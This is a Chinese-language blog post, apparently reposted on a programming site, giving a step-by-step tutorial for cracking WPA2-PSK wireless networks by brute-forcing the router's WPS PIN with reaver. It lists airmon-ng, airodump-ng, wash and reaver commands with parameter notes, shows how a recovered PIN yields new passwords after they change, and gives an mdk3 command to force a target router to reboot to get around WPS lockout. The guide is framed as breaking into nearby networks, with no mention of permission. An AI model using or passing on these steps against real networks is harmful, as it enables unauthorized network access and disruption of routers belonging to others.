1. 全栈程序员必看首页

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

全栈程序员-站长 未分类 阅读 30

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]【前言】现在的路由器大多都默认用WPA2-PSK方式对无线网络进行加密了,不能再像WEP加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供WPS功能,通过这个功能,用户可以使用PIN码登录到路由器。但这个PIN码的长度只有8位,而且可能的取值只有11000种(注意,不是10…

大家好,又见面了,我是你们的朋友全栈君。

【前言】

    现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了,不能再像 WEP 加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供 WPS 功能,通过这个功能,用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8 位,而且可能的取值只有11000种(注意,不是 10^8 种)。所以我们可以进行简单粗暴的穷举 PIN 码破解,而且我们可以推断出这种破解方法在目标 AP 开启了 WPS 功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了,但至今依然奏效。

 

【操作步骤】

1、切换无线网卡到监听模式:
    airmon-ng  start  wlan0

2、刺探附近 WLAN 网络(这个命令所跟的参数值可以在 步骤1 完成后从提示信息中查看到):
    airodump-ng  wlan0mon

  使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

3、找出开启了 WPS 功能、可以使用 PIN码 登录的路由器,并另外记录下该 AP 的 BSSID(约等于该 AP 的 MAC 地址):
    wash  -i  wlan0mon

  使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

3、开始进行 PIN码 穷举破解(注意末尾的参数是 2 个小写字母 v):
    reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

参数说明:
-i  无线网卡名称
-b  目标AP的mac地址
-a  自动检测目标AP最佳配置
-S  使用最小的DH key,可以提高破解速度
-vv  显示更多的非严重警告(注意这是 2 个小写字母 v)
-d  即delay每穷举一次的闲置时间 预设为1秒
-c  信道编号
-p  PIN码四位或八位  //可以用8位直接找到密码。

  使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

 

4、等待破解完成(这个破解可能会时间比较长,和你的目标 AP 有关,我当时花费了 12 个小时才破解出来),这期间我们可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度 信息:

  使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

破解完成后,查看并记录下 PIN码 和 密码:

  使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

 

5、获取到 PIN码 后,以后即便路由器更换了密码,我们也可以很迅速地通过 PIN码 重新获得新密码。以上方获取到的信息举例:

    reaver  -i  wlan0mon -b  xx:xx:xx:xx:xx:xx  -p 12316977

 

【注意事项】

    1、如果在执行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 这样的提示信息,那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash 命令并重新选择一个路由器吧。

    2、如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 这样的提示信息,这表示目标路由器开启了防 PIN破解 功能。因为我们是穷举 PIN码 进行破解的,当连续使用超过某个次数的 PIN码 后,路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS 功能,要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx (这是上面的目标AP的MAC地址)命令让路由器主动重启或被动重启以恢复 WPS 功能。

 

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/136049.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • uni-app 小程序生命周期

    uni-app 小程序生命周期

    uni-app 小程序生命周期详细请参见 uni app 官网应用生命周期 uni app 官网 1 整个应用的生命周期 onLaunch function console log AppLaunch onShow function console log AppShow onHide function console log AppHide onError function err console lo

    全栈程序员-站长的头像 全栈程序员-站长
    2025年10月10日
    0
  • 能向入口函数传入多个参数的 QueueUserWorkItem

    能向入口函数传入多个参数的 QueueUserWorkItem

    能向入口函数传入多个参数的 QueueUserWorkItem不啰嗦了,花一周时间也没赶上std::async和std::thread的设计,标准库的设计真的,很优秀。我记下这段时间里做了什么;这里包含了把函数拆成两步调用的方法,第一步传参,第二步执行;SplitInvoke;如果我能把第一步放到A线程,第二步放到B线程,就能解决std::thread潜在的两次拷贝和对象(Windows的窗口对象等)绑定到线程问题,就能制造一个优于std::…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月24日
    2
  • python正则匹配中文或数字_Python匹配中文的正则表达式

    python正则匹配中文或数字_Python匹配中文的正则表达式

    python正则匹配中文或数字_Python匹配中文的正则表达式正则表达式并不是Python的一部分。正则表达式是用于处理字符串的强大工具,拥有自己独特的语法以及一个独立的处理引擎,效率上可能不如str自带的方法,但功能十分强大。得益于这一点,在提供了正则表达式的语言里,正则表达式的语法都是一样的,区别只在于不同的编程语言实现支持的语法数量不同;但不用担心,不被支持的语法通常是不常用的部分。Python正则表达式简介正则表达式是一个特殊的字符序列,它能帮助你方…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月25日
    12
  • 密码学的基础知识_密码学的基本概念

    密码学的基础知识_密码学的基本概念

    密码学的基础知识_密码学的基本概念最近在研究密码学加密,签名方面的东西。经过几天的学习对一些基础知识进行一下整理PKI:PKI是PublicKeyInfrastructure的首字母缩写,翻译过来就是公钥基础设施,在X509标准

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月4日
    8
  • STM32中文参考手册_haar小波分解

    STM32中文参考手册_haar小波分解

    STM32中文参考手册_haar小波分解注:本文是程序的说明和实现思路,代码见:https://download.csdn.net/download/hnxyxiaomeng/10301718一、主要思路原始信号:OrgSig信号长度:DWT_SIG_LEN小波分解层数:N与MATLAB类似,小波分解后产生2个数组DWT_L和DWT_C,但定义与MATLAB不同。定义如下:DWT_L:[DWT_SIG_LEN,c…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月19日
    2
  • 2 NICs on same subnet

    2 NICs on same subnet

    2 NICs on same subnet

    全栈程序员-站长的头像 全栈程序员-站长
    2021年8月12日
    66

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号